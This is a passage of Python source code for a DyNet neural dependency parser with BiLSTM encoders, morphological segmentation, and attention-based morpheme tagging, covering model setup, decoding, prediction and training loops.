VanillaLSTMBuilder(1, self.ldims * 2, self.ldims, self.model)]\n elif self.layers > 0:\n self.builders = [VanillaLSTMBuilder(self.layers, self.wdims + self.cdims * 2 + self.morph_dims + self.mtag_dims + self.pdims, self.ldims, self.model),\n VanillaLSTMBuilder(self.layers, self.wdims + self.cdims * 2 + self.morph_dims + self.mtag_dims + self.pdims, self.ldims, self.model)]\n else:\n self.builders = [SimpleRNNBuilder(1, self.wdims + self.cdims * 2 + self.morph_dims + self.mtag_dims, self.ldims, self.model),\n SimpleRNNBuilder(1, self.wdims + self.cdims * 2 + self.morph_dims + self.mtag_dims, self.ldims, self.model)]\n\n self.ffSeqPredictor = FFSequencePredictor(Layer(self.model, self.ldims * 2, len(self.pos), softmax))\n\n self.hidden_units = options.hidden_units\n\n self.hidBias = self.model.add_parameters((self.ldims * 8))\n self.hidLayer = self.model.add_parameters((self.hidden_units, self.ldims * 8))\n self.hid2Bias = self.model.add_parameters((self.hidden_units))\n\n self.outLayer = self.model.add_parameters((1, self.hidden_units if self.hidden_units > 0 else self.ldims * 8))\n\n if self.labelsFlag:\n self.rhidBias = self.model.add_parameters((self.ldims * 8))\n self.rhidLayer = self.model.add_parameters((self.hidden_units, self.ldims * 8))\n self.rhid2Bias = self.model.add_parameters((self.hidden_units))\n self.routLayer = self.model.add_parameters(\n (len(self.irels), self.hidden_units if self.hidden_units > 0 else self.ldims * 8))\n self.routBias = self.model.add_parameters((len(self.irels)))\n self.ffRelPredictor = FFSequencePredictor(\n Layer(self.model, self.hidden_units if self.hidden_units > 0 else self.ldims * 8, len(self.irels),\n softmax))\n\n self.char_rnn = RNNSequencePredictor(LSTMBuilder(1, self.cdims, self.cdims, self.model))\n\n if self.morphFlag:\n self.seg_lstm = [VanillaLSTMBuilder(1, self.cdims, self.cdims, self.model),\n VanillaLSTMBuilder(1, self.cdims, self.cdims, self.model)]\n self.seg_hidLayer = self.model.add_parameters((1, self.cdims*2))\n self.slookup = self.model.add_lookup_parameters((len(self.c2i), self.cdims))\n\n self.char_lstm = [VanillaLSTMBuilder(1, self.cdims, self.mdims, self.model),\n VanillaLSTMBuilder(1, self.cdims, self.mdims, self.model)]\n self.char_hidLayer = self.model.add_parameters((self.mdims, self.mdims*2))\n self.mclookup = self.model.add_lookup_parameters((len(self.c2i), self.cdims))\n\n self.morph_lstm = [VanillaLSTMBuilder(1, self.mdims*2, self.wdims, self.model),\n VanillaLSTMBuilder(1, self.mdims*2, self.wdims, self.model)]\n self.morph_hidLayer = self.model.add_parameters((self.wdims, self.wdims*2))\n self.mlookup = self.model.add_lookup_parameters((len(m2i), self.mdims))\n\n self.morph_rnn = RNNSequencePredictor(LSTMBuilder(1, self.mdims*2, self.mdims*2, self.model))\n\n if self.morphTagFlag:\n # All weights for morpheme taging will be here. (CURSOR)\n\n # Decoder\n self.dec_lstm = VanillaLSTMBuilder(1, 2 * self.cdims + self.tdims + self.cdims * 2, self.cdims, self.model)\n\n # Attention\n self.attention_w1 = self.model.add_parameters((self.tagging_attention_size, self.cdims * 2))\n self.attention_w2 = self.model.add_parameters((self.tagging_attention_size, self.cdims * 2))\n self.attention_v = self.model.add_parameters((1, self.tagging_attention_size))\n\n # Attention Context\n self.attention_w1_context = self.model.add_parameters((self.tagging_attention_size, self.cdims * 2))\n self.attention_w2_context = self.model.add_parameters((self.tagging_attention_size, self.cdims * 2))\n self.attention_v_context = self.model.add_parameters((1, self.tagging_attention_size))\n\n # MLP - Softmax\n self.decoder_w = self.model.add_parameters((len(t2i), self.cdims))\n self.decoder_b = self.model.add_parameters((len(t2i)))\n\n self.mtag_rnn = RNNSequencePredictor(VanillaLSTMBuilder(1, self.tdims, self.tdims, self.model))\n self.tlookup = self.model.add_lookup_parameters((len(t2i), self.tdims))\n\n if self.mtag_encoding_composition_type != \"None\":\n self.mtag_composition_w = self.model.add_parameters((self.tagging_attention_size, 2 * self.tdims))\n self.mtag_composition_b = self.model.add_parameters(self.tagging_attention_size)\n self.mtag_composition_context = self.model.add_parameters(self.tagging_attention_size)\n if self.morph_encoding_composition_type != \"None\":\n self.morph_composition_w = self.model.add_parameters((self.tagging_attention_size, self.mdims*4))\n self.morph_composition_b = self.model.add_parameters(self.tagging_attention_size)\n self.morph_composition_context = self.model.add_parameters(self.tagging_attention_size)\n if self.pos_encoding_composition_type != \"None\":\n self.pos_composition_w = self.model.add_parameters((self.tagging_attention_size, self.pdims))\n self.pos_composition_b = self.model.add_parameters(self.tagging_attention_size)\n self.pos_composition_context = self.model.add_parameters(self.tagging_attention_size)\n\n def initialize(self):\n if self.morphFlag and self.ext_embeddings:\n print(\"Initializing word embeddings by morph2vec\")\n count = 0\n for word in self.vocab:\n if word not in self.ext_embeddings and word in self.morph_dict:\n morph_seg = self.morph_dict[word]\n\n count += 1\n self.wlookup.init_row(self.vocab[word], self.__getWordVector(morph_seg).vec_value())\n print(\"Vocab size: %d; #missing words having generated vectors: %d\" % (len(self.vocab), count))\n renew_cg()\n\n def __getExpr(self, sentence, i, j):\n\n if sentence[i].headfov is None:\n sentence[i].headfov = concatenate([sentence[i].lstms[0], sentence[i].lstms[1]])\n if sentence[j].modfov is None:\n sentence[j].modfov = concatenate([sentence[j].lstms[0], sentence[j].lstms[1]])\n\n _inputVector = concatenate(\n [sentence[i].headfov, sentence[j].modfov, dynet.abs(sentence[i].headfov - sentence[j].modfov),\n dynet.cmult(sentence[i].headfov, sentence[j].modfov)])\n\n if self.hidden_units > 0:\n output = self.outLayer.expr() * self.activation(\n self.hid2Bias.expr() + self.hidLayer.expr() * self.activation(\n _inputVector + self.hidBias.expr()))\n else:\n output = self.outLayer.expr() * self.activation(_inputVector + self.hidBias.expr())\n\n return output\n\n def __evaluate(self, sentence):\n exprs = [[self.__getExpr(sentence, i, j) for j in range(len(sentence))] for i in range(len(sentence))]\n scores = np.array([[output.scalar_value() for output in exprsRow] for exprsRow in exprs])\n\n return scores, exprs\n\n def pick_neg_log(self, pred, gold):\n return -dynet.log(dynet.pick(pred, gold))\n\n def binary_crossentropy(self, pred, gold):\n return dynet.binary_log_loss(pred, gold)\n\n def cosine_proximity(self, pred, gold):\n def l2_normalize(x):\n square_sum = dynet.sqrt(dynet.bmax(dynet.sum_elems(dynet.square(x)), np.finfo(float).eps * dynet.ones((1))[0]))\n return dynet.cdiv(x, square_sum)\n\n y_true = l2_normalize(pred)\n y_pred = l2_normalize(gold)\n\n return -dynet.sum_elems(dynet.cmult(y_true, y_pred))\n\n def __getRelVector(self, sentence, i, j):\n if sentence[i].rheadfov is None:\n sentence[i].rheadfov = concatenate([sentence[i].lstms[0], sentence[i].lstms[1]])\n if sentence[j].rmodfov is None:\n sentence[j].rmodfov = concatenate([sentence[j].lstms[0], sentence[j].lstms[1]])\n _outputVector = concatenate(\n [sentence[i].rheadfov, sentence[j].rmodfov, abs(sentence[i].rheadfov - sentence[j].rmodfov),\n cmult(sentence[i].rheadfov, sentence[j].rmodfov)])\n\n if self.hidden_units > 0:\n return self.rhid2Bias.expr() + self.rhidLayer.expr() * self.activation(\n _outputVector + self.rhidBias.expr())\n else:\n return _outputVector\n\n def __getSegmentationVector(self, word):\n slstm_forward = self.seg_lstm[0].initial_state()\n slstm_backward = self.seg_lstm[1].initial_state()\n\n seg_lstm_forward = slstm_forward.transduce([self.slookup[self.c2i[char] if char in self.c2i else 0] for char in word])\n seg_lstm_backward = slstm_backward.transduce([self.slookup[self.c2i[char] if char in self.c2i else 0] for char in reversed(word)])\n\n seg_vec = []\n for seg, rev_seg in zip(seg_lstm_forward,reversed(seg_lstm_backward)):\n seg_vec.append(dynet.logistic(self.seg_hidLayer.expr() * concatenate([seg,rev_seg])))\n\n seg_vec = concatenate(seg_vec)\n\n return seg_vec\n\n def __getMorphVector(self, morph):\n clstm_forward = self.char_lstm[0].initial_state()\n clstm_backward = self.char_lstm[1].initial_state()\n\n char_lstm_forward = clstm_forward.transduce([self.mclookup[self.c2i[char] if char in self.c2i else 0] for char in morph] if len(morph) > 0 else [self.mclookup[0]])[-1]\n char_lstm_backward = clstm_backward.transduce([self.mclookup[self.c2i[char] if char in self.c2i else 0] for char in reversed(morph)] if len(morph) > 0 else [self.mclookup[0]])[-1]\n\n char_emb = self.char_hidLayer.expr() * concatenate([char_lstm_forward,char_lstm_backward])\n\n return concatenate([self.mlookup[self.m2i[morph] if morph in self.m2i else 0], char_emb])\n\n def __getWordVector(self, morph_seg):\n mlstm_forward = self.morph_lstm[0].initial_state()\n mlstm_backward = self.morph_lstm[1].initial_state()\n\n morph_lstm_forward = mlstm_forward.transduce([self.__getMorphVector(morph) for morph in morph_seg])[-1]\n morph_lstm_backward = mlstm_backward.transduce([self.__getMorphVector(morph) for morph in reversed(morph_seg)])[-1]\n\n morph_enc = concatenate([morph_lstm_forward, morph_lstm_backward])\n word_vec = self.morph_hidLayer.expr() * morph_enc\n\n return word_vec\n\n def attend(self, input_mat, state, w1dt):\n w2 = parameter(self.attention_w2)\n v = parameter(self.attention_v)\n\n # input_mat: (encoder_state x seqlen) => input vecs concatenated as cols\n # w1dt: (attdim x seqlen)\n # w2dt: (attdim,1)\n w2dt = w2 * concatenate(list(state.s()))\n # att_weights: (seqlen,) row vector\n # unnormalized: (seqlen,)\n unnormalized = transpose(v * tanh(colwise_add(w1dt, w2dt)))\n att_weights = softmax(unnormalized)\n # context: (encoder_state)\n context = input_mat * att_weights\n return context\n\n def attend_context(self, input_mat, state, w1dt_context):\n w2_context = parameter(self.attention_w2_context)\n v_context = parameter(self.attention_v_context)\n\n # input_mat: (encoder_state x seqlen) => input vecs concatenated as cols\n # w1dt: (attdim x seqlen)\n # w2dt: (attdim,1)\n w2dt_context = w2_context * concatenate(list(state.s()))\n # att_weights: (seqlen,) row vector\n # unnormalized: (seqlen,)\n unnormalized = transpose(v_context * tanh(colwise_add(w1dt_context, w2dt_context)))\n att_weights = softmax(unnormalized)\n # context: (encoder_state)\n context = input_mat * att_weights\n return context\n\n def decode(self, vectors, decoder_seq, word_context):\n w = parameter(self.decoder_w)\n b = parameter(self.decoder_b)\n w1 = parameter(self.attention_w1)\n\n w1_context = parameter(self.attention_w1_context)\n input_mat = concatenate_cols(vectors)\n input_context = concatenate_cols(word_context)\n\n w1dt = None\n w1dt_context = None\n\n last_output_embeddings = self.tlookup[self.t2i[\"\"]]\n s = self.dec_lstm.initial_state().add_input(concatenate([vecInput(self.cdims * 2),\n last_output_embeddings,\n vecInput(self.cdims * 2)]))\n loss = []\n\n for char in decoder_seq:\n # w1dt can be computed and cached once for the entire decoding phase\n w1dt = w1dt or w1 * input_mat\n w1dt_context = w1dt_context or w1_context * input_context\n vector = concatenate([self.attend(input_mat, s, w1dt),\n last_output_embeddings,\n self.attend_context(input_context, s, w1dt_context)])\n s = s.add_input(vector)\n out_vector = w * s.output() + b\n probs = softmax(out_vector)\n last_output_embeddings = self.tlookup[char]\n loss.append(-log(pick(probs, char)))\n loss = esum(loss)\n return loss\n\n def __getLossMorphTagging(self, all_encoded_states, decoder_gold, word_context):\n return self.decode(all_encoded_states, decoder_gold, word_context)\n\n def generate(self, encoded, word_context):\n w = parameter(self.decoder_w)\n b = parameter(self.decoder_b)\n w1 = parameter(self.attention_w1)\n\n w1_context = parameter(self.attention_w1_context)\n\n input_mat = concatenate_cols(encoded)\n input_context = concatenate_cols(word_context)\n\n w1dt = None\n w1dt_context = None\n\n last_output_embeddings = self.tlookup[self.t2i[\"\"]]\n s = self.dec_lstm.initial_state().add_input(concatenate([vecInput(self.cdims * 2),\n last_output_embeddings,\n vecInput(self.cdims * 2)]))\n\n out = []\n count_EOS = 0\n limit_features = 10\n for i in range(limit_features):\n if count_EOS == 2: break\n # w1dt can be computed and cached once for the entire decoding phase\n w1dt = w1dt or w1 * input_mat\n w1dt_context = w1dt_context or w1_context * input_context\n vector = concatenate([self.attend(input_mat, s, w1dt),\n last_output_embeddings,\n self.attend_context(input_context, s, w1dt_context)])\n\n s = s.add_input(vector)\n out_vector = w * s.output() + b\n probs = softmax(out_vector).vec_value()\n next_char = probs.index(max(probs))\n last_output_embeddings = self.tlookup[next_char]\n if next_char == self.t2i[\"\"]:\n count_EOS += 1\n out.append(next_char)\n return out\n\n def Save(self, filename):\n self.model.save(filename)\n\n def Load(self, filename):\n self.model.populate(filename)\n\n def attend_encodings(self, encoded_sequence, encoding_type):\n if encoding_type == self.mtag_encoding_composition_type:\n w = self.mtag_composition_w \n b = self.mtag_composition_b\n c = self.mtag_composition_context\n elif encoding_type == self.morph_encoding_composition_type:\n w = self.morph_composition_w \n b = self.morph_composition_b\n c = self.morph_composition_context\n elif encoding_type == self.pos_encoding_composition_type:\n w = self.pos_composition_w \n b = self.pos_composition_b\n c = self.pos_composition_context\n\n att_mlp_outputs = []\n for e in encoded_sequence:\n mlp_out = (w * e) + b\n att_mlp_outputs.append(mlp_out)\n\n lst = []\n for o in att_mlp_outputs:\n lst.append(exp(sum_elems(cmult(o, c))))\n\n sum_all = esum(lst)\n\n probs = [cdiv(e, sum_all) for e in lst]\n att_context = esum(\n [cmult(p, h) for p, h in zip(probs, encoded_sequence)]\n )\n return att_context\n\n def Predict(self, conll_path):\n with open(conll_path, 'r') as conllFP:\n for iSentence, sentence in enumerate(read_conll(conllFP, self.c2i, self.m2i, self.t2i, self.morph_dict)):\n conll_sentence = [entry for entry in sentence if isinstance(entry, utils.ConllEntry)]\n\n if self.morphTagFlag:\n sentence_context = []\n last_state_char = self.char_rnn.predict_sequence([self.clookup[self.c2i[\"\"]]])[-1]\n rev_last_state_char = self.char_rnn.predict_sequence([self.clookup[self.c2i[\"\"]]])[-1]\n sentence_context.append(concatenate([last_state_char, rev_last_state_char]))\n for entry in conll_sentence:\n last_state_char = self.char_rnn.predict_sequence([self.clookup[c] for c in entry.idChars])\n rev_last_state_char = self.char_rnn.predict_sequence([self.clookup[c] for c in reversed(entry.idChars)])\n entry.char_rnn_states = [concatenate([f,b]) for f,b in zip(last_state_char, rev_last_state_char)]\n sentence_context.append(entry.char_rnn_states[-1])\n\n for idx, entry in enumerate(conll_sentence):\n #wordvec = self.wlookup[int(self.vocab.get(entry.norm, 0))] if self.wdims > 0 else None\n wordvec = inputTensor(entry.embedding)\n if self.morphTagFlag:\n entry.vec = concatenate([wordvec, entry.char_rnn_states[-1]])\n else:\n last_state_char = self.char_rnn.predict_sequence([self.clookup[c] for c in entry.idChars])[-1]\n rev_last_state_char = self.char_rnn.predict_sequence([self.clookup[c] for c in reversed(entry.idChars)])[-1]\n entry.vec = concatenate([wordvec, last_state_char, rev_last_state_char])\n \n morph_encodings = []\n for idx, entry in enumerate(conll_sentence):\n if self.morphFlag:\n if len(entry.norm) > 2:\n if self.goldMorphFlag:\n seg_vec = self.__getSegmentationVector(entry.norm)\n seg_vec = dynet.vecInput(seg_vec.dim()[0][0])\n seg_vec.set(entry.idMorphs)\n morph_seg = utils.generate_morphs(entry.norm, seg_vec.vec_value())\n entry.pred_seg = morph_seg\n else:\n seg_vec = self.__getSegmentationVector(entry.norm)\n morph_seg = utils.generate_morphs(entry.norm, seg_vec.vec_value())\n entry.pred_seg = seg_vec.vec_value()\n else:\n morph_seg = [entry.norm]\n entry.pred_seg = entry.idMorphs\n\n entry.seg = entry.idMorphs\n\n last_state_morph = self.morph_rnn.predict_sequence([self.__getMorphVector(morph) for morph in morph_seg])[-1]\n rev_last_state_morph = self.morph_rnn.predict_sequence([self.__getMorphVector(morph) for morph in reversed(morph_seg)])[\n -1]\n encoding_morph = concatenate([last_state_morph, rev_last_state_morph])\n morph_encodings.append(encoding_morph)\n\n if self.morphFlag:\n upper_morph_encodings = []\n if self.morph_encoding_composition_type == \"morph_attention\":\n for idx, encoding in enumerate(morph_encodings):\n tmp = []\n if idx - 1 > 0:\n tmp.append(morph_encodings[idx-1])\n tmp.append(encoding) \n if idx+1 < len(morph_encodings):\n tmp.append(morph_encodings[idx+1])\n upper_morph_encodings.append(self.attend_encodings(tmp, self.morph_encoding_composition_type))\n else:\n upper_morph_encodings = morph_encodings\n\n if self.morph_wsum_composition_alpha != 0:\n for index, _ in enumerate(upper_morph_encodings):\n if index > 0:\n upper_morph_encodings [index] = \\\n self.morph_wsum_composition_alpha * upper_morph_encodings[index-1] + \\\n (1 - self.morph_wsum_composition_alpha) * upper_morph_encodings[index]\n \n for entry, morph in zip(conll_sentence, upper_morph_encodings):\n entry.vec = concatenate([entry.vec, morph])\n \n morphtag_encodings = []\n for idx, entry in enumerate(conll_sentence):\n if self.morphTagFlag:\n if self.goldMorphTagFlag:\n morph_tags = entry.idMorphTags\n entry.pred_tags = entry.idMorphTags\n entry.pred_tags_tokens = [self.i2t[m_tag_id] for m_tag_id in entry.pred_tags]\n else: \n word_context = [c for i, c in enumerate(sentence_context) if i - 1 != idx]\n entry.pred_tags = self.generate(entry.char_rnn_states, word_context)\n morph_tags = entry.pred_tags\n entry.tags = entry.idMorphTags\n entry.pred_tags_tokens = [self.i2t[m_tag_id] for m_tag_id in entry.pred_tags]\n\n last_state_mtag = self.mtag_rnn.predict_sequence([self.tlookup[t] for t in morph_tags])[-1]\n rev_last_state_mtag = self.mtag_rnn.predict_sequence([self.tlookup[t] for t in reversed(morph_tags)])[-1]\n current_encoding_mtag = concatenate([last_state_mtag, rev_last_state_mtag]) \n morphtag_encodings.append(current_encoding_mtag)\n\n if self.morphTagFlag: \n upper_morphtag_encodings = []\n if self.mtag_encoding_composition_type == \"mtag_attention\":\n for idx, encoding in enumerate(morphtag_encodings):\n tmp = []\n if idx - 1 > 0:\n tmp.append(morphtag_encodings[idx-1])\n tmp.append(encoding) \n if idx+1 < len(morphtag_encodings):\n tmp.append(morphtag_encodings[idx+1])\n upper_morphtag_encodings.append(self.attend_encodings(tmp, self.mtag_encoding_composition_type))\n else:\n upper_morphtag_encodings = morphtag_encodings\n \n if self.mtag_wsum_composition_alpha != 0:\n for index, mtag in enumerate(upper_morphtag_encodings):\n if index > 0:\n upper_morphtag_encodings [index] = \\\n self.mtag_wsum_composition_alpha * upper_morphtag_encodings[index-1] + \\\n (1 - self.mtag_wsum_composition_alpha) * upper_morphtag_encodings[index]\n\n for entry, mtag in zip(conll_sentence, upper_morphtag_encodings):\n entry.vec = concatenate([entry.vec, mtag])\n\n\n for idx, entry in enumerate(conll_sentence):\n entry.pos_lstms = [entry.vec, entry.vec]\n entry.headfov = None\n entry.modfov = None\n\n entry.rheadfov = None\n entry.rmodfov = None\n\n #Predicted pos tags\n lstm_forward = self.pos_builders[0].initial_state()\n lstm_backward = self.pos_builders[1].initial_state()\n for entry, rentry in zip(conll_sentence, reversed(conll_sentence)):\n lstm_forward = lstm_forward.add_input(entry.vec)\n lstm_backward = lstm_backward.add_input(rentry.vec)\n\n entry.pos_lstms[1] = lstm_forward.output()\n rentry.pos_lstms[0] = lstm_backward.output()\n\n for entry in conll_sentence:\n entry.pos_vec = concatenate(entry.pos_lstms)\n\n blstm_forward = self.pos_bbuilders[0].initial_state()\n blstm_backward = self.pos_bbuilders[1].initial_state()\n\n for entry, rentry in zip(conll_sentence, reversed(conll_sentence)):\n blstm_forward = blstm_forward.add_input(entry.pos_vec)\n blstm_backward = blstm_backward.add_input(rentry.pos_vec)\n entry.pos_lstms[1] = blstm_forward.output()\n rentry.pos_lstms[0] = blstm_backward.output()\n\n concat_layer = [concatenate(entry.pos_lstms) for entry in conll_sentence]\n outputFFlayer = self.ffSeqPredictor.predict_sequence(concat_layer)\n predicted_pos_indices = [np.argmax(o.value()) for o in outputFFlayer]\n predicted_postags = [self.id2pos[idx] for idx in predicted_pos_indices]\n\n pos_encodings = []\n for entry, posid in zip(conll_sentence, predicted_pos_indices):\n pos_encodings.append(self.plookup[posid])\n upper_pos_encodings = []\n if self.pos_encoding_composition_type == \"pos_attention\":\n for idx, encoding in enumerate(pos_encodings):\n tmp = []\n if idx - 1 > 0:\n tmp.append(pos_encodings[idx-1])\n tmp.append(encoding) \n if idx+1 < len(pos_encodings):\n tmp.append(pos_encodings[idx+1])\n upper_pos_encodings.append(self.attend_encodings(tmp, self.pos_encoding_composition_type))\n else:\n upper_pos_encodings = pos_encodings\n\n if self.pos_wsum_composition_alpha != 0:\n for index, _ in enumerate(upper_pos_encodings):\n if index > 0:\n upper_pos_encodings [index] = \\\n self.pos_wsum_composition_alpha * upper_pos_encodings[index-1] + \\\n (1 - self.pos_wsum_composition_alpha) * upper_pos_encodings[index]\n for entry, pos in zip(conll_sentence, upper_pos_encodings):\n entry.vec = concatenate([entry.vec, pos])\n entry.lstms = [entry.vec, entry.vec]\n \"\"\"\n # Add predicted pos tags for parsing prediction\n for entry, posid in zip(conll_sentence, predicted_pos_indices):\n entry.vec = concatenate([entry.vec, self.plookup[posid]])\n entry.lstms = [entry.vec, entry.vec]\n \"\"\"\n if self.blstmFlag:\n lstm_forward = self.builders[0].initial_state()\n lstm_backward = self.builders[1].initial_state()\n\n for entry, rentry in zip(conll_sentence, reversed(conll_sentence)):\n lstm_forward = lstm_forward.add_input(entry.vec)\n lstm_backward = lstm_backward.add_input(rentry.vec)\n\n entry.lstms[1] = lstm_forward.output()\n rentry.lstms[0] = lstm_backward.output()\n\n if self.bibiFlag:\n for entry in conll_sentence:\n entry.vec = concatenate(entry.lstms)\n\n blstm_forward = self.bbuilders[0].initial_state()\n blstm_backward = self.bbuilders[1].initial_state()\n\n for entry, rentry in zip(conll_sentence, reversed(conll_sentence)):\n blstm_forward = blstm_forward.add_input(entry.vec)\n blstm_backward = blstm_backward.add_input(rentry.vec)\n\n entry.lstms[1] = blstm_forward.output()\n rentry.lstms[0] = blstm_backward.output()\n\n scores, exprs = self.__evaluate(conll_sentence)\n heads = decoder.parse_proj(scores)\n\n # Multiple roots: heading to the previous \"rooted\" one\n rootCount = 0\n rootWid = -1\n for index, head in enumerate(heads):\n if head == 0:\n rootCount += 1\n if rootCount == 1:\n rootWid = index\n if rootCount > 1:\n heads[index] = rootWid\n rootWid = index\n\n for entry, head, pos in zip(conll_sentence, heads, predicted_postags):\n entry.pred_parent_id = head\n entry.pred_relation = '_'\n entry.pred_pos = pos\n\n dump = False\n\n if self.labelsFlag:\n concat_layer = [self.__getRelVector(conll_sentence, head, modifier + 1) for modifier, head in\n enumerate(heads[1:])]\n outputFFlayer = self.ffRelPredictor.predict_sequence(concat_layer)\n predicted_rel_indices = [np.argmax(o.value()) for o in outputFFlayer]\n predicted_rels = [self.irels[idx] for idx in predicted_rel_indices]\n for modifier, head in enumerate(heads[1:]):\n conll_sentence[modifier + 1].pred_relation = predicted_rels[modifier]\n\n renew_cg()\n if not dump:\n yield sentence\n\n def morph2word(self, morph_dict):\n word_emb = {}\n for word in morph_dict.keys():\n morph_seg = morph_dict[word]\n\n word_vec = self.__getWordVector(morph_seg)\n word_emb[word] = word_vec.vec_value()\n renew_cg()\n return word_emb\n\n def morph(self):\n morph_dict = {}\n for morph in self.m2i.keys():\n morph_dict[morph] = self.__getMorphVector(morph).vec_value()\n renew_cg()\n return morph_dict\n\n def Train_Morph(self):\n self.trainer.set_sparse_updates(False)\n start = time.time()\n for iWord, word in enumerate(list(self.morph_dict.keys())):\n if iWord % 2000 == 0 and iWord != 0:\n print(\"Processing word number: %d\" % iWord, \", Time: %.2f\" % (time.time() - start))\n start = time.time()\n\n morph_seg = self.morph_dict[word]\n morph_vec = self.__getWordVector(morph_seg)\n\n if self.ext_embeddings is None:\n vec_gold = self.wlookup[int(self.vocab.get(word, 0))].vec_value()\n elif word in self.ext_embeddings:\n vec_gold = self.ext_embeddings[word]\n else:\n vec_gold = None\n\n if vec_gold is not None:\n y_gold = dynet.vecInput(self.wdims)\n y_gold.set(vec_gold)\n mErrs = self.cosine_proximity(morph_vec, y_gold)\n mErrs.backward()\n self.trainer.update()\n renew_cg()\n\n def embed_word(self, word):\n return [self.input_lookup[char] for char in word]\n\n def run_lstm(self, init_state, input_vecs):\n s = init_state\n out_vectors = []\n for vector in input_vecs:\n s = s.add_input(vector)\n out_vector = s.output()\n out_vectors.append(out_vector)\n return out_vectors\n\n def encode_word(self, word):\n word_rev = list(reversed(word))\n fwd_vectors = self.run_lstm(self.enc_fwd_lstm.initial_state(), word)\n bwd_vectors = self.run_lstm(self.enc_bwd_lstm.initial_state(), word_rev)\n bwd_vectors = list(reversed(bwd_vectors))\n vectors = [concatenate(list(p)) for p in zip(fwd_vectors, bwd_vectors)]\n return vectors\n\n def Train(self, conll_path):\n self.trainer.set_sparse_updates(True)\n eloss = 0.0\n mloss = 0.0\n eerrors = 0\n etotal = 0\n start = time.time()\n\n with open(conll_path, 'r') as conllFP:\n shuffledData = list(read_conll(conllFP, self.c2i, self.m2i, self.t2i, self.morph_dict))\n random.shuffle(shuffledData)\n\n errs = []\n lerrs = []\n posErrs = []\n segErrs = []\n mTagErrs = []\n\n for iSentence, sentence in enumerate(shuffledData):\n if iSentence % 500 == 0 and iSentence != 0:\n print(\"Processing sentence number: %d\" % iSentence, \", Loss: %.4f\" % (\n eloss / etotal), \", Time: %.2f\" % (time.time() - start))\n start = time.time()\n eerrors = 0\n eloss = 0.0\n etotal = 0\n\n conll_sentence = [entry for entry in sentence if isinstance(entry, utils.ConllEntry)]\n\n if self.morphTagFlag:\n sentence_context = []\n last_state_char = self.char_rnn.predict_sequence([self.clookup[self.c2i[\"\"]]])[-1]\n rev_last_state_char = self.char_rnn.predict_sequence([self.clookup[self.c2i[\"\"]]])[-1]\n sentence_context.append(concatenate([last_state_char, rev_last_state_char]))\n for entry in conll_sentence:\n last_state_char = self.char_rnn.predict_sequence([self.clookup[c] for c in entry.idChars])\n rev_last_state_char = self.char_rnn.predict_sequence([self.clookup[c] for c in reversed(entry.idChars)])\n entry.char_rnn_states = [concatenate([f,b]) for f,b in zip(last_state_char, rev_last_state_char)]\n sentence_context.append(entry.char_rnn_states[-1])\n\n for idx, entry in enumerate(conll_sentence):\n c = float(self.wordsCount.get(entry.norm, 0))\n dropFlag = (random.random() < (c / (0.25 + c)))\n #wordvec = self.wlookup[\n # int(self.vocab.get(entry.norm, 0)) if dropFlag else 0] if self.wdims > 0 else None\n \n wordvec = inputTensor(entry.embedding)\n\n if self.morphTagFlag :\n entry.vec = dynet.dropout(concatenate([wordvec, entry.char_rnn_states[-1]]), 0.33)\n else:\n last_state_char = self.char_rnn.predict_sequence([self.clookup[c] for c in entry.idChars])[-1]\n rev_last_state_char = self.char_rnn.predict_sequence([self.clookup[c] for c in reversed(entry.idChars)])[-1]\n entry.vec = dynet.dropout(concatenate([wordvec, last_state_char, rev_last_state_char]), 0.33)\n \n morph_encodings = []\n for idx, entry in enumerate(conll_sentence):\n if self.morphFlag:\n if len(entry.norm) > 2:\n if self.goldMorphFlag:\n seg_vec = self.__getSegmentationVector(entry.norm)\n seg_vec = dynet.vecInput(seg_vec.dim()[0][0])\n seg_vec.set(entry.idMorphs)\n morph_seg = utils.generate_morphs(entry.norm, seg_vec.vec_value())\n else:\n seg_vec = self.__getSegmentationVector(entry.norm)\n morph_seg = utils.generate_morphs(entry.norm, seg_vec.vec_value())\n vec_gold = dynet.vecInput(seg_vec.dim()[0][0])\n vec_gold.set(entry.idMorphs)\n segErrs.append(self.binary_crossentropy(seg_vec,vec_gold))\n else:\n morph_seg = [entry.norm]\n\n last_state_morph = self.morph_rnn.predict_sequence([self.__getMorphVector(morph) for morph in morph_seg])[-1]\n rev_last_state_morph = self.morph_rnn.predict_sequence([self.__getMorphVector(morph) for morph in reversed(morph_seg)])[\n -1]\n encoding_morph = concatenate([last_state_morph, rev_last_state_morph])\n morph_encodings.append(encoding_morph)\n \n if self.morphFlag:\n upper_morph_encodings = []\n if self.morph_encoding_composition_type == \"morph_attention\":\n for idx, encoding in enumerate(morph_encodings):\n tmp = []\n if idx - 1 > 0:\n tmp.append(morph_encodings[idx-1])\n tmp.append(encoding) \n if idx+1 < len(morph_encodings):\n tmp.append(morph_encodings[idx+1])\n upper_morph_encodings.append(self.attend_encodings(tmp, self.morph_encoding_composition_type))\n else:\n upper_morph_encodings = morph_encodings\n\n if self.morph_wsum_composition_alpha != 0:\n for index, _ in enumerate(upper_morph_encodings):\n if index > 0:\n upper_morph_encodings [index] = \\\n self.morph_wsum_composition_alpha * upper_morph_encodings[index-1] + \\\n (1 - self.morph_wsum_composition_alpha) * upper_morph_encodings[index]\n\n for entry, morph in zip(conll_sentence, upper_morph_encodings):\n entry.vec = concatenate([entry.vec, dynet.dropout(morph, 0.33)])\n\n\n morphtag_encodings = []\n for idx, entry in enumerate(conll_sentence):\n if self.morphTagFlag:\n if self.goldMorphTagFlag:\t\n morph_tags = entry.idMorphTags\n else:\n word_context = [c for i, c in enumerate(sentence_context) if i-1 != idx]\n mTagErrs.append(\n self.__getLossMorphTagging(entry.char_rnn_states, entry.idMorphTags, word_context))\n predicted_sequence = self.generate(entry.char_rnn_states, word_context)\n morph_tags = predicted_sequence\n\n last_state_mtag = self.mtag_rnn.predict_sequence([self.tlookup[t] for t in morph_tags])[-1]\n rev_last_state_mtag = \\\n self.mtag_rnn.predict_sequence([self.tlookup[t] for t in reversed(morph_tags)])[\n -1] \n current_encoding_mtag = concatenate([last_state_mtag, rev_last_state_mtag]) \n morphtag_encodings.append(current_encoding_mtag)\n \n if self.morphTagFlag:\n upper_morphtag_encodings = []\n if self.mtag_encoding_composition_type == \"mtag_attention\":\n for idx, encoding in enumerate(morphtag_encodings):\n tmp = []\n if idx - 1 > 0:\n tmp.append(morphtag_encodings[idx-1])\n tmp.append(encoding) \n if idx+1 < len(morphtag_encodings):\n tmp.append(morphtag_encodings[idx+1])\n upper_morphtag_encodings.append(self.attend_encodings(tmp, self.mtag_encoding_composition_type))\n else:\n upper_morphtag_encodings = morphtag_encodings\n if self.mtag_wsum_composition_alpha != 0:\n for index, 